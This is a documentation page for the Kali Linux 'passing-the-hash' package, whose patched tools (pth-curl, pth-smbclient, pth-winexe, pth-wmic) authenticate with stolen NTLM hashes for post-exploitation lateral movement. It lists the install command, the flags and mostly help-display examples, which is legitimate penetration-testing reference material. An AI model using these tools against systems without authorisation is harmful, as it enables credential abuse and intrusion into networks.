Post Exploitationpthpass-the-hashsambacurlsmbclientwinexewmicauthentication

Passing the Hash

Patched tools to use password hashes as authentication input instead of plaintext passwords. Contains modified versions of Curl, Iceweasel, FreeTDS, Samba 4, WinEXE and WMI prefixed with 'pth-'.

Description

The passing-the-hash package provides modified versions of common network tools that support authentication using NTLM password hashes rather than requiring plaintext passwords. This enables post-exploitation scenarios where an attacker has obtained password hashes from a compromised system but lacks the actual passwords.

Tools are installed as executables starting with the 'pth-' prefix, such as pth-curl, pth-smbclient, pth-winexe, and pth-wmic. These patched binaries integrate hash-based authentication into protocols like SMB, HTTP, WMI, and RPC, facilitating lateral movement and remote administration without password cracking.

Use cases include authenticating to Windows shares, executing remote commands, querying WMI, and interacting with Samba services using stolen NTLM hashes. The package depends on various libraries including libc6, libgnutls30t64, samba-common-bin, and smbclient.

How It Works

The tools are patched versions of standard utilities (Curl, Samba tools, Winexe, WMI client) that accept NTLM password hashes via specific credential options like --pw-nt-hash. Instead of transmitting plaintext passwords over the network, they perform pass-the-hash authentication by using the hash directly in the NTLM challenge-response protocol. This leverages Windows authentication mechanisms where valid NTLM hashes can authenticate without knowledge of the original password. Binaries are prefixed with 'pth-' to distinguish them from standard tools.

Installation

bash

sudo apt install passing-the-hash

Flags

--pw-nt-hashThe supplied password is the NT hash (pth-rpcclient)

-U, --user=[DOMAIN/]USERNAME[%PASSWORD]Set the network username (pth-rpcclient, pth-wmic)

-N, --no-passDon't ask for a password (pth-rpcclient, pth-wmic)

--password=STRINGPassword or hash (pth-rpcclient, pth-wmic)

-A, --authentication-file=FILEGet the credentials from a file (pth-rpcclient, pth-wmic)

-p, --port=PORTSpecify port number (pth-rpcclient)

-c, --command=COMMANDSExecute semicolon separated cmds (pth-rpcclient)

--runas=[DOMAIN\]USERNAME%PASSWORDRun as the given user (pth-winexe)

Examples

Display help for pth-curl showing usage and options

pth-curl -h

Display help for pth-net showing net commands like rpc, rap, ads

pth-net -h

Display help for pth-rpcclient showing credential and connection options

pth-rpcclient --help

Display help for pth-smbclient showing SMB connection options

pth-smbclient --help

Display help for pth-smbget showing file download options

pth-smbget --help

Display help for pth-sqsh showing Sybase connection flags

pth-sqsh --help

Display help for pth-winexe showing remote execution options

pth-winexe --help

Query WMI on remote host using credentials

pth-wmic -U [domain/]adminuser%password //host "select * from Win32_ComputerSystem"

Updated 2026-04-16kali.org ↗